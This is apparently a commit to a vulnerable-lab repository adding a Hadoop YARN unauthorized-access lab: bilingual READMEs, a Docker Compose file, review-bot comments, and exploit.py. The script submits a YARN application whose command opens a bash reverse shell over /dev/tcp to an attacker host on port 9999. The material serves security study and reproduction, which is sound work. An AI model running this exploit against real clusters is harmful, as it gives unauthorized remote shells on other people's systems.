first commit
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Vulhub Docker Image CI / images-test (push) Has been cancelled
32
hadoop/unauthorized-yarn/README.md
Normal file
@@ -0,0 +1,32 @@
# Hadoop YARN ResourceManager Unauthorized Access

[中文版本(Chinese version)](README.zh-cn.md)

Hadoop YARN (Yet Another Resource Negotiator) is Apache Hadoop's cluster resource management system. If the YARN ResourceManager is exposed to the public internet without proper access controls, an attacker can submit and execute arbitrary applications on the cluster.

References:

- <http://archive.hack.lu/2016/Wavestone%20-%20Hack.lu%202016%20-%20Hadoop%20safari%20-%20Hunting%20for%20vulnerabilities%20-%20v1.0.pdf>
- <https://hadoop.apache.org/docs/r2.7.3/hadoop-yarn/hadoop-yarn-site/ResourceManagerRest.html>

## Environment Setup

Execute the following command to start vulnerable Hadoop YARN environment:

```
docker compose up -d
```

After the environment starts, visit `http://your-ip:8088` to access the Hadoop YARN ResourceManager WebUI.

## Vulnerability Reproduction

The exploitation method differs slightly from the original presentation. Even without a Hadoop client, you can submit tasks directly through the REST API (https://hadoop.apache.org/docs/r2.7.3/hadoop-yarn/hadoop-yarn-site/ResourceManagerRest.html).

The exploitation process is as follows:

1. Set up a listener on your local machine to receive the reverse shell connection
2. Call the New Application API to create an Application
3. Call the Submit Application API to submit the malicious application

For detailed implementation, refer to the [exploit script](exploit.py).
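Review bot: the README never states which Hadoop release the environment runs, while `docker-compose.yml` in this same commit pins `vulhub/hadoop:2.8.1`; add the version to the first paragraph so readers know which release the reproduction was validated against. Two smaller points in the same hunk: step 1 of the reproduction list tells the reader to set up a listener but names no port, whereas `exploit.py` expects port 9999 (its comment reads `# put your local host ip here, and listen at port 9999`), so state the port in the step or point to the script's comment; and "start vulnerable Hadoop YARN environment" should read "start the vulnerable Hadoop YARN environment". The bare ``` fence around `docker compose up -d` could also carry a `bash` tag.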
30
hadoop/unauthorized-yarn/README.zh-cn.md
Normal file
@@ -0,0 +1,30 @@
# Hadoop YARN ResourceManager 未授权访问漏洞

Hadoop YARN(Yet Another Resource Negotiator)是Apache Hadoop的集群资源管理系统。YARN ResourceManager中存在一个未授权访问漏洞,由于缺少访问控制,未经授权的用户可以在集群上提交并执行任意应用程序。

参考链接:

- <http://archive.hack.lu/2016/Wavestone%20-%20Hack.lu%202016%20-%20Hadoop%20safari%20-%20Hunting%20for%20vulnerabilities%20-%20v1.0.pdf>
- <https://hadoop.apache.org/docs/r2.7.3/hadoop-yarn/hadoop-yarn-site/ResourceManagerRest.html>

## 环境搭建

执行如下命令启动环境:

```
docker compose up -d
```

环境启动后,访问`http://your-ip:8088`即可看到Hadoop YARN ResourceManager的Web管理界面。

## 漏洞复现

漏洞利用方法与原始演示文稿中的方法略有不同。即使没有Hadoop客户端,也可以直接通过REST API(https://hadoop.apache.org/docs/r2.7.3/hadoop-yarn/hadoop-yarn-site/ResourceManagerRest.html)提交任务执行。

漏洞利用过程如下:

1. 在本地机器上设置监听器,等待反弹shell连接
2. 调用New Application API创建应用程序
3. 调用Submit Application API提交恶意应用程序

具体实现请参考[漏洞利用脚本](exploit.py)。
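Review bot: the Chinese README lacks the reciprocal link that the English file has: `README.md` opens with `[中文版本(Chinese version)](README.zh-cn.md)`, but nothing after the title here links back to `README.md`, so a reader landing on this file cannot find the English text. The first paragraph also differs in substance from the English version: here the issue is described as a vulnerability present in ResourceManager ("存在一个未授权访问漏洞"), while `README.md` attributes it to the ResourceManager being exposed without proper access controls; align the two so both files state the same root cause. As in the English file, step 1 names no listener port even though `exploit.py` expects 9999.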
35
hadoop/unauthorized-yarn/docker-compose.yml
Normal file
@@ -0,0 +1,35 @@
services:
  namenode:
    image: vulhub/hadoop:2.8.1
    environment:
      - HDFS_CONF_dfs_namenode_name_dir=file:///hadoop/dfs/name
      - CLUSTER_NAME=vulhub
      - HDFS_CONF_dfs_replication=1
    command: /namenode.sh

  datanode:
    image: vulhub/hadoop:2.8.1
    environment:
      - HDFS_CONF_dfs_datanode_data_dir=file:///hadoop/dfs/data
      - CORE_CONF_fs_defaultFS=hdfs://namenode:8020
      - CLUSTER_NAME=vulhub
      - HDFS_CONF_dfs_replication=1
    command: /datanode.sh

  resourcemanager:
    image: vulhub/hadoop:2.8.1
    environment:
      - CORE_CONF_fs_defaultFS=hdfs://namenode:8020
      - YARN_CONF_yarn_log___aggregation___enable=true
    command: /resourcemanager.sh
    ports:
      - "8088:8088"

  nodemanager:
    image: vulhub/hadoop:2.8.1
    environment:
      - CORE_CONF_fs_defaultFS=hdfs://namenode:8020
      - YARN_CONF_yarn_resourcemanager_hostname=resourcemanager
      - YARN_CONF_yarn_log___aggregation___enable=true
      - YARN_CONF_yarn_nodemanager_remote___app___log___dir=/app-logs
    command: /nodemanager.sh
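Review bot: `datanode`, `resourcemanager` and `nodemanager` all point at `hdfs://namenode:8020`, and the nodemanager additionally at `YARN_CONF_yarn_resourcemanager_hostname=resourcemanager`, yet no service declares `depends_on`, so Compose may start them before the namenode or resourcemanager is listening; unless `/datanode.sh`, `/resourcemanager.sh` and `/nodemanager.sh` retry on their own, add `depends_on: [namenode]` to the three dependants and `depends_on: [resourcemanager]` to the nodemanager. Publishing only `"8088:8088"` on the resourcemanager is the right scope for this lab: it is the single port the reproduction uses, and the HDFS and NodeManager ports stay confined to the Compose network rather than being exposed on the host.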
22
hadoop/unauthorized-yarn/exploit.py
Normal file
@@ -0,0 +1,22 @@
#!/usr/bin/env python

import requests

target = 'http://127.0.0.1:8088/'
lhost = '192.168.0.1' # put your local host ip here, and listen at port 9999

url = target + 'ws/v1/cluster/apps/new-application'
resp = requests.post(url)
app_id = resp.json()['application-id']
url = target + 'ws/v1/cluster/apps'
data = {
    'application-id': app_id,
    'application-name': 'get-shell',
    'am-container-spec': {
        'commands': {
            'command': '/bin/bash -i >& /dev/tcp/%s/9999 0>&1' % lhost,
        },
    },
    'application-type': 'YARN',
}
requests.post(url, json=data)
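Review bot: neither HTTP response is checked. After `resp = requests.post(url)`, `resp.json()['application-id']` fails with an unhelpful exception whenever the target is not a ResourceManager, returns an error page, or has authentication enabled, and the result of the final `requests.post(url, json=data)` is discarded, so the user is never told whether the submission was accepted; call `resp.raise_for_status()` after each POST and print the status code and body of the last one. Two style points: the shebang `#!/usr/bin/env python` should be `#!/usr/bin/env python3`, since `python` may resolve to Python 2 or be absent on current systems; and `target` and `lhost` are hard-coded constants that the README steps never mention, so either read them from the command line or state in the README that the script must be edited before it is run.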